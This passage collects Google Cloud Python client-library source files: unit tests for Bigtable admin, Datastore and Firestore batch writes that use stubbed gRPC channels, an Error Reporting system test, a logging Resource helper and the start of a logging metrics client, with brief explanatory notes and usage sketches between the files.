channel = ChannelStub(responses=[CustomException()])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
with pytest.raises(CustomException):
client.generate_consistency_token(name)
def test_check_consistency(self):
# Setup Expected Response
consistent = True
expected_response = {'consistent': consistent}
expected_response = bigtable_table_admin_pb2.CheckConsistencyResponse(
**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
consistency_token = 'consistency<PASSWORD>'
response = client.check_consistency(name, consistency_token)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = bigtable_table_admin_pb2.CheckConsistencyRequest(
name=name, consistency_token=consistency_token)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_check_consistency_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
consistency_token = 'consistencyToken-<PASSWORD>'
with pytest.raises(CustomException):
client.check_consistency(name, consistency_token)
def test_snapshot_table(self):
# Setup Expected Response
name_2 = 'name2-1052831874'
data_size_bytes = 2110122398
description_2 = 'description2568623279'
expected_response = {
'name': name_2,
'data_size_bytes': data_size_bytes,
'description': description_2
}
expected_response = table_pb2.Snapshot(**expected_response)
operation = operations_pb2.Operation(
name='operations/test_snapshot_table', done=True)
operation.response.Pack(expected_response)
# Mock the API response
channel = ChannelStub(responses=[operation])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
cluster = 'cluster872092154'
snapshot_id = 'snapshotId-168585866'
description = 'description-1724546052'
response = client.snapshot_table(name, cluster, snapshot_id,
description)
result = response.result()
assert expected_response == result
assert len(channel.requests) == 1
expected_request = bigtable_table_admin_pb2.SnapshotTableRequest(
name=name,
cluster=cluster,
snapshot_id=snapshot_id,
description=description)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_snapshot_table_exception(self):
# Setup Response
error = status_pb2.Status()
operation = operations_pb2.Operation(
name='operations/test_snapshot_table_exception', done=True)
operation.error.CopyFrom(error)
# Mock the API response
channel = ChannelStub(responses=[operation])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
name = client.table_path('[PROJECT]', '[INSTANCE]', '[TABLE]')
cluster = 'cluster872092154'
snapshot_id = 'snapshotId-168585866'
description = 'description-1724546052'
response = client.snapshot_table(name, cluster, snapshot_id,
description)
exception = response.exception()
assert exception.errors[0] == error
def test_get_snapshot(self):
# Setup Expected Response
name_2 = 'name2-1052831874'
data_size_bytes = 2110122398
description = 'description-1724546052'
expected_response = {
'name': name_2,
'data_size_bytes': data_size_bytes,
'description': description
}
expected_response = table_pb2.Snapshot(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
name = client.snapshot_path('[PROJECT]', '[INSTANCE]', '[CLUSTER]',
'[SNAPSHOT]')
response = client.get_snapshot(name)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = bigtable_table_admin_pb2.GetSnapshotRequest(
name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_get_snapshot_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup request
name = client.snapshot_path('[PROJECT]', '[INSTANCE]', '[CLUSTER]',
'[SNAPSHOT]')
with pytest.raises(CustomException):
client.get_snapshot(name)
def test_list_snapshots(self):
# Setup Expected Response
next_page_token = ''
snapshots_element = {}
snapshots = [snapshots_element]
expected_response = {
'next_page_token': next_page_token,
'snapshots': snapshots
}
expected_response = bigtable_table_admin_pb2.ListSnapshotsResponse(
**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
parent = client.cluster_path('[PROJECT]', '[INSTANCE]', '[CLUSTER]')
paged_list_response = client.list_snapshots(parent)
resources = list(paged_list_response)
assert len(resources) == 1
assert expected_response.snapshots[0] == resources[0]
assert len(channel.requests) == 1
expected_request = bigtable_table_admin_pb2.ListSnapshotsRequest(
parent=parent)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_list_snapshots_exception(self):
channel = ChannelStub(responses=[CustomException()])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup request
parent = client.cluster_path('[PROJECT]', '[INSTANCE]', '[CLUSTER]')
paged_list_response = client.list_snapshots(parent)
with pytest.raises(CustomException):
list(paged_list_response)
def test_delete_snapshot(self):
channel = ChannelStub()
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup Request
name = client.snapshot_path('[PROJECT]', '[INSTANCE]', '[CLUSTER]',
'[SNAPSHOT]')
client.delete_snapshot(name)
assert len(channel.requests) == 1
expected_request = bigtable_table_admin_pb2.DeleteSnapshotRequest(
name=name)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_delete_snapshot_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = bigtable_admin_v2.BigtableTableAdminClient(channel=channel)
# Setup request
name = client.snapshot_path('[PROJECT]', '[INSTANCE]', '[CLUSTER]',
'[SNAPSHOT]')
with pytest.raises(CustomException):
client.delete_snapshot(name)
```
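The tests above never open a real channel: `ChannelStub` fakes `grpc.Channel.unary_unary`, and `MultiCallableStub` records each `(method, request)` pair while replaying canned responses from the end of the `responses` list. The fragment below shows those mechanics in isolation; it assumes it is appended to the test module so `ChannelStub` is in scope, and `FakeRequest`/`FakeResponse` are placeholder classes rather than real protobuf messages.

```python
# Illustration of the ChannelStub pattern used throughout this test module
# (assumes the ChannelStub class defined above is in scope).
class FakeRequest(object):
    pass


class FakeResponse(object):
    pass


channel = ChannelStub(responses=[FakeResponse()])
callable_ = channel.unary_unary('/some.Service/SomeMethod')
response = callable_(FakeRequest())

# The canned response was replayed and the request was recorded.
assert isinstance(response, FakeResponse)
assert channel.requests[0][0] == '/some.Service/SomeMethod'
assert isinstance(channel.requests[0][1], FakeRequest)
```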
#### File: tests/unit/test_client.py
```python
import unittest
import mock
def _make_credentials():
import google.auth.credentials
class _CredentialsWithScopes(
google.auth.credentials.Credentials,
google.auth.credentials.Scoped):
pass
return mock.Mock(spec=_CredentialsWithScopes)
@mock.patch('google.auth.transport.grpc.secure_authorized_channel')
def _make_channel(secure_authorized_channel):
from google.api_core import grpc_helpers
target = 'example.com:443'
channel = grpc_helpers.create_channel(
target, credentials=mock.sentinel.credentials)
return channel
class TestClient(unittest.TestCase):
PROJECT = 'PROJECT'
INSTANCE_ID = 'instance-id'
DISPLAY_NAME = 'display-name'
USER_AGENT = 'you-sir-age-int'
@staticmethod
def _get_target_class():
from google.cloud.bigtable.client import Client
return Client
def _make_one(self, *args, **kwargs):
return self._get_target_class()(*args, **kwargs)
def test_constructor_both_admin_and_read_only(self):
credentials = _make_credentials()
with self.assertRaises(ValueError):
self._make_one(
project=self.PROJECT, credentials=credentials,
admin=True, read_only=True)
def test__get_scopes_default(self):
from google.cloud.bigtable.client import DATA_SCOPE
client = self._make_one(
project=self.PROJECT, credentials=_make_credentials())
self.assertEqual(client._get_scopes(), (DATA_SCOPE,))
def test__get_scopes_admin(self):
from google.cloud.bigtable.client import ADMIN_SCOPE
from google.cloud.bigtable.client import DATA_SCOPE
client = self._make_one(
project=self.PROJECT, credentials=_make_credentials(),
admin=True)
expected_scopes = (DATA_SCOPE, ADMIN_SCOPE)
self.assertEqual(client._get_scopes(), expected_scopes)
def test__get_scopes_read_only(self):
from google.cloud.bigtable.client import READ_ONLY_SCOPE
client = self._make_one(
project=self.PROJECT, credentials=_make_credentials(),
read_only=True)
self.assertEqual(client._get_scopes(), (READ_ONLY_SCOPE,))
def test_credentials_getter(self):
credentials = _make_credentials()
project = 'PROJECT'
client = self._make_one(
project=project, credentials=credentials)
self.assertIs(client._credentials, credentials)
def test_project_name_property(self):
credentials = _make_credentials()
project = 'PROJECT'
client = self._make_one(
project=project, credentials=credentials, admin=True)
project_name = 'projects/' + project
self.assertEqual(client.project_path, project_name)
def test_instance_factory_defaults(self):
from google.cloud.bigtable.instance import Instance
PROJECT = 'PROJECT'
INSTANCE_ID = 'instance-id'
DISPLAY_NAME = 'display-name'
credentials = _make_credentials()
client = self._make_one(
project=PROJECT, credentials=credentials)
instance = client.instance(INSTANCE_ID, display_name=DISPLAY_NAME)
self.assertIsInstance(instance, Instance)
self.assertEqual(instance.instance_id, INSTANCE_ID)
self.assertEqual(instance.display_name, DISPLAY_NAME)
self.assertIs(instance._client, client)
def test_instance_factory_w_explicit_serve_nodes(self):
from google.cloud.bigtable.instance import Instance
PROJECT = 'PROJECT'
INSTANCE_ID = 'instance-id'
DISPLAY_NAME = 'display-name'
LOCATION_ID = 'locname'
credentials = _make_credentials()
client = self._make_one(
project=PROJECT, credentials=credentials)
instance = client.instance(
INSTANCE_ID, display_name=DISPLAY_NAME, location=LOCATION_ID)
self.assertIsInstance(instance, Instance)
self.assertEqual(instance.instance_id, INSTANCE_ID)
self.assertEqual(instance.display_name, DISPLAY_NAME)
self.assertEqual(instance._cluster_location_id, LOCATION_ID)
self.assertIs(instance._client, client)
def test_admin_client_w_value_error(self):
channel = _make_channel()
client = self._make_one(project=self.PROJECT, channel=channel)
with self.assertRaises(ValueError):
client._table_admin_client()
with self.assertRaises(ValueError):
client._instance_admin_client()
def test_list_instances(self):
from google.cloud.bigtable_admin_v2.proto import (
instance_pb2 as data_v2_pb2)
from google.cloud.bigtable_admin_v2.proto import (
bigtable_instance_admin_pb2 as messages_v2_pb2)
FAILED_LOCATION = 'FAILED'
INSTANCE_ID1 = 'instance-id1'
INSTANCE_ID2 = 'instance-id2'
INSTANCE_NAME1 = (
'projects/' + self.PROJECT + '/instances/' + INSTANCE_ID1)
INSTANCE_NAME2 = (
'projects/' + self.PROJECT + '/instances/' + INSTANCE_ID2)
channel = _make_channel()
client = self._make_one(project=self.PROJECT, channel=channel,
admin=True)
# Create response_pb
response_pb = messages_v2_pb2.ListInstancesResponse(
failed_locations=[
FAILED_LOCATION,
],
instances=[
data_v2_pb2.Instance(
name=INSTANCE_NAME1,
display_name=INSTANCE_NAME1,
),
data_v2_pb2.Instance(
name=INSTANCE_NAME2,
display_name=INSTANCE_NAME2,
),
],
)
# Patch the stub used by the API method.
bigtable_instance_stub = (
client._instance_admin_client.bigtable_instance_admin_stub)
bigtable_instance_stub.ListInstances.side_effect = [response_pb]
expected_result = response_pb
# Perform the method and check the result.
result = client.list_instances()
self.assertEqual(result, expected_result)
```
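A detail worth noting in `_make_credentials()` above: the mock is spec'd against a class that mixes `Credentials` with `Scoped`, because google-auth only re-scopes credentials that implement the `Scoped` interface. The sketch below illustrates that behaviour with `google.auth.credentials.with_scopes_if_required`; the scope literal is just an example.

```python
# Sketch: why the credentials mock mixes in the Scoped interface.
import mock
import google.auth.credentials


class _CredentialsWithScopes(
        google.auth.credentials.Credentials,
        google.auth.credentials.Scoped):
    pass


creds = mock.Mock(spec=_CredentialsWithScopes)
creds.requires_scopes = True

# with_scopes_if_required only calls with_scopes() on Scoped credentials;
# plain Credentials mocks would be returned unchanged.
google.auth.credentials.with_scopes_if_required(
    creds, ['https://www.googleapis.com/auth/cloud-platform'])
creds.with_scopes.assert_called_once_with(
    ['https://www.googleapis.com/auth/cloud-platform'])
```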
#### File: gapic/v1/test_datastore_client_v1.py
```python
import pytest
from google.cloud import datastore_v1
from google.cloud.datastore_v1 import enums
from google.cloud.datastore_v1.proto import datastore_pb2
from google.cloud.datastore_v1.proto import entity_pb2
class MultiCallableStub(object):
"""Stub for the grpc.UnaryUnaryMultiCallable interface."""
def __init__(self, method, channel_stub):
self.method = method
self.channel_stub = channel_stub
def __call__(self, request, timeout=None, metadata=None, credentials=None):
self.channel_stub.requests.append((self.method, request))
response = None
if self.channel_stub.responses:
response = self.channel_stub.responses.pop()
if isinstance(response, Exception):
raise response
if response:
return response
class ChannelStub(object):
"""Stub for the grpc.Channel interface."""
    def __init__(self, responses=None):
        # Use None as the default to avoid sharing one mutable list
        # between ChannelStub instances.
        self.responses = responses if responses is not None else []
        self.requests = []
def unary_unary(self,
method,
request_serializer=None,
response_deserializer=None):
return MultiCallableStub(method, self)
class CustomException(Exception):
pass
class TestDatastoreClient(object):
def test_lookup(self):
# Setup Expected Response
expected_response = {}
expected_response = datastore_pb2.LookupResponse(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = datastore_v1.DatastoreClient(channel=channel)
# Setup Request
project_id = 'projectId-1969970175'
keys = []
response = client.lookup(project_id, keys)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = datastore_pb2.LookupRequest(
project_id=project_id, keys=keys)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_lookup_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = datastore_v1.DatastoreClient(channel=channel)
# Setup request
project_id = 'projectId-1969970175'
keys = []
with pytest.raises(CustomException):
client.lookup(project_id, keys)
def test_run_query(self):
# Setup Expected Response
expected_response = {}
expected_response = datastore_pb2.RunQueryResponse(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = datastore_v1.DatastoreClient(channel=channel)
# Setup Request
project_id = 'projectId-1969970175'
partition_id = {}
response = client.run_query(project_id, partition_id)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = datastore_pb2.RunQueryRequest(
project_id=project_id, partition_id=partition_id)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_run_query_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = datastore_v1.DatastoreClient(channel=channel)
# Setup request
project_id = 'projectId-1969970175'
partition_id = {}
with pytest.raises(CustomException):
client.run_query(project_id, partition_id)
def test_begin_transaction(self):
# Setup Expected Response
transaction = b'-34'
expected_response = {'transaction': transaction}
expected_response = datastore_pb2.BeginTransactionResponse(
**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = datastore_v1.DatastoreClient(channel=channel)
# Setup Request
project_id = 'projectId-1969970175'
response = client.begin_transaction(project_id)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = datastore_pb2.BeginTransactionRequest(
project_id=project_id)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_begin_transaction_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = datastore_v1.DatastoreClient(channel=channel)
# Setup request
project_id = 'projectId-1969970175'
with pytest.raises(CustomException):
client.begin_transaction(project_id)
def test_commit(self):
# Setup Expected Response
index_updates = 1425228195
expected_response = {'index_updates': index_updates}
expected_response = datastore_pb2.CommitResponse(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = datastore_v1.DatastoreClient(channel=channel)
# Setup Request
project_id = 'projectId-1969970175'
mode = enums.CommitRequest.Mode.MODE_UNSPECIFIED
mutations = []
response = client.commit(project_id, mode, mutations)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = datastore_pb2.CommitRequest(
project_id=project_id, mode=mode, mutations=mutations)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_commit_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = datastore_v1.DatastoreClient(channel=channel)
# Setup request
project_id = 'projectId-1969970175'
mode = enums.CommitRequest.Mode.MODE_UNSPECIFIED
mutations = []
with pytest.raises(CustomException):
client.commit(project_id, mode, mutations)
def test_rollback(self):
# Setup Expected Response
expected_response = {}
expected_response = datastore_pb2.RollbackResponse(**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = datastore_v1.DatastoreClient(channel=channel)
# Setup Request
project_id = 'projectId-1969970175'
transaction = b'-34'
response = client.rollback(project_id, transaction)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = datastore_pb2.RollbackRequest(
project_id=project_id, transaction=transaction)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_rollback_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = datastore_v1.DatastoreClient(channel=channel)
# Setup request
project_id = 'projectId-1969970175'
transaction = b'-34'
with pytest.raises(CustomException):
client.rollback(project_id, transaction)
def test_allocate_ids(self):
# Setup Expected Response
expected_response = {}
expected_response = datastore_pb2.AllocateIdsResponse(
**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = datastore_v1.DatastoreClient(channel=channel)
# Setup Request
project_id = 'projectId-1969970175'
keys = []
response = client.allocate_ids(project_id, keys)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = datastore_pb2.AllocateIdsRequest(
project_id=project_id, keys=keys)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_allocate_ids_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = datastore_v1.DatastoreClient(channel=channel)
# Setup request
project_id = 'projectId-1969970175'
keys = []
with pytest.raises(CustomException):
client.allocate_ids(project_id, keys)
def test_reserve_ids(self):
# Setup Expected Response
expected_response = {}
expected_response = datastore_pb2.ReserveIdsResponse(
**expected_response)
# Mock the API response
channel = ChannelStub(responses=[expected_response])
client = datastore_v1.DatastoreClient(channel=channel)
# Setup Request
project_id = 'projectId-1969970175'
keys = []
response = client.reserve_ids(project_id, keys)
assert expected_response == response
assert len(channel.requests) == 1
expected_request = datastore_pb2.ReserveIdsRequest(
project_id=project_id, keys=keys)
actual_request = channel.requests[0][1]
assert expected_request == actual_request
def test_reserve_ids_exception(self):
# Mock the API response
channel = ChannelStub(responses=[CustomException()])
client = datastore_v1.DatastoreClient(channel=channel)
# Setup request
project_id = 'projectId-1969970175'
keys = []
with pytest.raises(CustomException):
client.reserve_ids(project_id, keys)
```
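The Datastore tests above pass empty `keys` and `mutations` lists, which keeps the request protos trivial. For reference, a populated lookup against the same stub might look like the sketch below; it assumes it is appended to the test module so `ChannelStub`, `datastore_v1`, and `datastore_pb2` are in scope, and the project, kind, and entity name are illustrative.

```python
# Sketch: a lookup call with a real key, using the ChannelStub defined above.
from google.cloud.datastore_v1.proto import entity_pb2

key = entity_pb2.Key(
    partition_id=entity_pb2.PartitionId(project_id='my-project'),
    path=[entity_pb2.Key.PathElement(kind='Task', name='sample-task')],
)
channel = ChannelStub(responses=[datastore_pb2.LookupResponse()])
client = datastore_v1.DatastoreClient(channel=channel)
client.lookup('my-project', [key])

# The recorded request carries the populated key.
expected = datastore_pb2.LookupRequest(project_id='my-project', keys=[key])
assert channel.requests[0][1] == expected
```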
#### File: gapic/v1beta1/test_system_report_errors_service_v1beta1.py
```python
import os
import time
from google.cloud import errorreporting_v1beta1
from google.cloud.errorreporting_v1beta1.proto import common_pb2
from google.cloud.errorreporting_v1beta1.proto import report_errors_service_pb2
class TestSystemReportErrorsService(object):
def test_report_error_event(self):
project_id = os.environ['PROJECT_ID']
client = errorreporting_v1beta1.ReportErrorsServiceClient()
project_name = client.project_path(project_id)
message = '[MESSAGE]'
service = '[SERVICE]'
service_context = {'service': service}
file_path = 'path/to/file.lang'
line_number = 42
function_name = 'meaningOfLife'
report_location = {
'file_path': file_path,
'line_number': line_number,
'function_name': function_name
}
context = {'report_location': report_location}
event = {
'message': message,
'service_context': service_context,
'context': context
}
response = client.report_error_event(project_name, event)
```
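Unlike the stub-based tests, this is a live system test: it requires a `PROJECT_ID` environment variable and application default credentials with the Error Reporting API enabled, and it actually sends an event. A common hardening step, sketched below, is to skip rather than fail when the environment is not configured; the marker name is an assumption, not part of the original test.

```python
# Sketch: a skip guard for the system test above when PROJECT_ID is unset.
import os

import pytest

requires_project_id = pytest.mark.skipif(
    'PROJECT_ID' not in os.environ,
    reason='PROJECT_ID environment variable is not set',
)


@requires_project_id
def test_report_error_event_guarded():
    # Same body as TestSystemReportErrorsService.test_report_error_event,
    # executed only when the environment is configured.
    pass
```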
#### File: tests/unit/test_batch.py
```python
import unittest
import mock
class TestWriteBatch(unittest.TestCase):
@staticmethod
def _get_target_class():
from google.cloud.firestore_v1beta1.batch import WriteBatch
return WriteBatch
def _make_one(self, *args, **kwargs):
klass = self._get_target_class()
return klass(*args, **kwargs)
def test_constructor(self):
batch = self._make_one(mock.sentinel.client)
self.assertIs(batch._client, mock.sentinel.client)
self.assertEqual(batch._write_pbs, [])
def test__add_write_pbs(self):
batch = self._make_one(mock.sentinel.client)
self.assertEqual(batch._write_pbs, [])
batch._add_write_pbs([mock.sentinel.write1, mock.sentinel.write2])
self.assertEqual(
batch._write_pbs, [mock.sentinel.write1, mock.sentinel.write2])
def test_create(self):
from google.cloud.firestore_v1beta1.proto import common_pb2
from google.cloud.firestore_v1beta1.proto import document_pb2
from google.cloud.firestore_v1beta1.proto import write_pb2
client = _make_client()
batch = self._make_one(client)
self.assertEqual(batch._write_pbs, [])
reference = client.document('this', 'one')
document_data = {'a': 10, 'b': 2.5}
ret_val = batch.create(reference, document_data)
self.assertIsNone(ret_val)
new_write_pb = write_pb2.Write(
update=document_pb2.Document(
name=reference._document_path,
fields={
'a': _value_pb(integer_value=document_data['a']),
'b': _value_pb(double_value=document_data['b']),
},
),
current_document=common_pb2.Precondition(exists=False),
)
self.assertEqual(batch._write_pbs, [new_write_pb])
def test_set(self):
from google.cloud.firestore_v1beta1.proto import document_pb2
from google.cloud.firestore_v1beta1.proto import write_pb2
client = _make_client()
batch = self._make_one(client)
self.assertEqual(batch._write_pbs, [])
reference = client.document('another', 'one')
field = 'zapzap'
value = u'meadows and flowers'
document_data = {field: value}
ret_val = batch.set(reference, document_data)
self.assertIsNone(ret_val)
new_write_pb = write_pb2.Write(
update=document_pb2.Document(
name=reference._document_path,
fields={
field: _value_pb(string_value=value),
},
),
)
self.assertEqual(batch._write_pbs, [new_write_pb])
def test_set_merge(self):
from google.cloud.firestore_v1beta1.proto import document_pb2
from google.cloud.firestore_v1beta1.proto import write_pb2
client = _make_client()
batch = self._make_one(client)
self.assertEqual(batch._write_pbs, [])
reference = client.document('another', 'one')
field = 'zapzap'
value = u'meadows and flowers'
document_data = {field: value}
ret_val = batch.set(reference, document_data, merge=True)
self.assertIsNone(ret_val)
new_write_pb = write_pb2.Write(
update=document_pb2.Document(
name=reference._document_path,
fields={
field: _value_pb(string_value=value),
},
),
update_mask={'field_paths': [field]}
)
self.assertEqual(batch._write_pbs, [new_write_pb])
def test_update(self):
from google.cloud.firestore_v1beta1.proto import common_pb2
from google.cloud.firestore_v1beta1.proto import document_pb2
from google.cloud.firestore_v1beta1.proto import write_pb2
client = _make_client()
batch = self._make_one(client)
self.assertEqual(batch._write_pbs, [])
reference = client.document('cats', 'cradle')
field_path = 'head.foot'
value = u'knees toes shoulders'
field_updates = {field_path: value}
ret_val = batch.update(reference, field_updates)
self.assertIsNone(ret_val)
map_pb = document_pb2.MapValue(fields={
'foot': _value_pb(string_value=value),
})
new_write_pb = write_pb2.Write(
update=document_pb2.Document(
name=reference._document_path,
fields={'head': _value_pb(map_value=map_pb)},
),
update_mask=common_pb2.DocumentMask(field_paths=[field_path]),
current_document=common_pb2.Precondition(exists=True),
)
self.assertEqual(batch._write_pbs, [new_write_pb])
def test_delete(self):
from google.cloud.firestore_v1beta1.proto import write_pb2
client = _make_client()
batch = self._make_one(client)
self.assertEqual(batch._write_pbs, [])
reference = client.document('early', 'mornin', 'dawn', 'now')
ret_val = batch.delete(reference)
self.assertIsNone(ret_val)
new_write_pb = write_pb2.Write(delete=reference._document_path)
self.assertEqual(batch._write_pbs, [new_write_pb])
def test_commit(self):
from google.cloud.firestore_v1beta1.proto import firestore_pb2
from google.cloud.firestore_v1beta1.proto import write_pb2
# Create a minimal fake GAPIC with a dummy result.
firestore_api = mock.Mock(spec=['commit'])
commit_response = firestore_pb2.CommitResponse(
write_results=[
write_pb2.WriteResult(),
write_pb2.WriteResult(),
],
)
firestore_api.commit.return_value = commit_response
# Attach the fake GAPIC to a real client.
client = _make_client('grand')
client._firestore_api_internal = firestore_api
# Actually make a batch with some mutations and call commit().
batch = self._make_one(client)
document1 = client.document('a', 'b')
batch.create(document1, {'ten': 10, 'buck': u'ets'})
document2 = client.document('c', 'd', 'e', 'f')
batch.delete(document2)
write_pbs = batch._write_pbs[::]
write_results = batch.commit()
self.assertEqual(write_results, list(commit_response.write_results))
# Make sure batch has no more "changes".
self.assertEqual(batch._write_pbs, [])
# Verify the mocks.
firestore_api.commit.assert_called_once_with(
client._database_string, write_pbs, transaction=None,
metadata=client._rpc_metadata)
def _value_pb(**kwargs):
from google.cloud.firestore_v1beta1.proto.document_pb2 import Value
return Value(**kwargs)
def _make_credentials():
import google.auth.credentials
return mock.Mock(spec=google.auth.credentials.Credentials)
def _make_client(project='seventy-nine'):
from google.cloud.firestore_v1beta1.client import Client
credentials = _make_credentials()
return Client(project=project, credentials=credentials)
```
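Outside the unit tests, the same `WriteBatch` is used by queueing several writes and flushing them with a single `commit()`. The sketch below reuses the `_make_client` helper from the module above, so the client is backed by mock credentials; the collection and field names are illustrative, and no RPC is issued because `commit()` is never called.

```python
# Sketch: accumulating writes on one batch (no commit, so no RPC is made).
from google.cloud.firestore_v1beta1.batch import WriteBatch

client = _make_client()
batch = WriteBatch(client)
batch.create(client.document('games', 'one'), {'score': 10})
batch.set(client.document('games', 'two'), {'score': 20}, merge=True)
batch.delete(client.document('games', 'gone'))

# Three Write protos are queued, mirroring the assertions in the tests above.
assert len(batch._write_pbs) == 3
```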
#### File: cloud/logging/resource.py
```python
import collections
class Resource(collections.namedtuple('Resource', 'type labels')):
"""A monitored resource identified by specifying values for all labels.
:type type: str
:param type: The resource type name.
:type labels: dict
:param labels: A mapping from label names to values for all labels
enumerated in the associated :class:`ResourceDescriptor`.
"""
__slots__ = ()
@classmethod
def _from_dict(cls, info):
"""Construct a resource object from the parsed JSON representation.
:type info: dict
:param info:
A ``dict`` parsed from the JSON wire-format representation.
:rtype: :class:`Resource`
:returns: A resource object.
"""
return cls(
type=info['type'],
labels=info.get('labels', {}),
)
def _to_dict(self):
"""Build a dictionary ready to be serialized to the JSON format.
:rtype: dict
:returns: A dict representation of the object that can be written to
the API.
"""
return {
'type': self.type,
'labels': self.labels,
}
```
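Usage of the `Resource` helper is a straightforward round trip between the namedtuple and its JSON wire format, as the short sketch below shows; the monitored-resource type and label values are illustrative, and the import path is assumed from the file location above.

```python
# Round-trip sketch for the Resource helper defined above (import path
# assumed to be google.cloud.logging.resource).
from google.cloud.logging.resource import Resource

info = {
    'type': 'gce_instance',
    'labels': {'instance_id': '1234567890', 'zone': 'us-central1-a'},
}
resource = Resource._from_dict(info)

assert resource.type == 'gce_instance'
assert resource.labels['zone'] == 'us-central1-a'
assert resource._to_dict() == info
```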
#### File: logging_v2/gapic/metrics_service_v2_client.py
```python
import functools
import pkg_resources
import google.api_core.gapic_v1.client_info
import google.api_core.gapic_v1.config
import google.api_core.gapic_v1.method
import google.api_core.grpc_helpers
import google.api_core.page_iterator
import google.api_core.path_template
from google.api import monitored_resource_pb2
from google.cloud.logging_v2.gapic import enums
from google.cloud.logging_v2.gapic import metrics_service_v2_client_config
from google.cloud.logging_v2.proto import log_entry_pb2
from google.cloud.logging_v2.proto import logging_config_pb2
from google.cloud.logging_v2.proto import logging_metrics_pb2
from google.cloud.logging_v2.proto import logging_pb2
from google.protobuf import field_mask_pb2
_GAPIC_LIBRARY_VERSION = pkg_resources.get_distribution(
'google-cloud-logging', ).version
class MetricsServiceV2Client(object):
"""Service for configuring logs-based metrics."""
SERVICE_ADDRESS = 'logging.googleapis.com:443'
"""The default address of the service."""
# The scopes needed to make gRPC calls to all of the methods defined in
# this service
_DEFAULT_SCOPES = (
'https://www.googleapis.com/auth/cloud-platform',
'https://www.googleapis.com/auth/cloud-platform.read-only',
'https://www.googleapis.com/auth/logging.admin',
'https://www.googleapis.com/auth/logging.read',
'https://www.googleapis.com/auth/logging.write',
)
# The name of the interface for this client. This is the key used to find
# method configuration in the client_config dictionary.
_INTERFACE_NAME = 'google.logging.v2.MetricsServiceV2'
@classmethod
def project_path(cls, project):
"""Return a fully-qualified project string."""
return google.api_core.path_template.expand(
'projects/{project}',
project=project,
)
@classmethod
def metric_path(cls, project, metric):
"""Return a fully-qualified metric string."""
return google.api_core.path_template.expand(
'projects/{project}/metrics/{metric}',
project=project,
metric=metric,
)
def __init__(self,
channel=None,
credentials=None,
client_config=metrics_service_v2_client_config.config,
client_info=None):
"""Constructor.
Args:
channel (grpc.Channel): A ``Channel`` instance through
which to make calls. This argument is mutually exclusive
with ``credentials``; providing both will raise an exception.
credentials (google.auth.credentials.Credentials): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If none
are specified, the client will attempt to ascertain the
credentials from the environment.
client_config (dict): A dictionary of call options for each
method. If not specified, the default configuration is used.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
"""
# If both `channel` and `credentials` are specified, raise an
# exception (channels come with credentials baked in already).
if channel is not None and credentials is not None:
raise ValueError(
'The `channel` and `credentials` arguments to {} are mutually '
'exclusive.'.format(self.__class__.__name__), )
# Create the channel.
if channel is None:
channel = google.api_core.grpc_helpers.create_channel(
self.SERVICE_ADDRESS,
credentials=credentials,
scopes=self._DEFAULT_SCOPES,
)
# Create the gRPC stubs.
self.metrics_service_v2_stub = (
logging_metrics_pb2.MetricsServiceV2Stub(channel))
if client_info is None:
client_info = (
google.api_core.gapic_v1.client_info.DEFAULT_CLIENT_INFO)
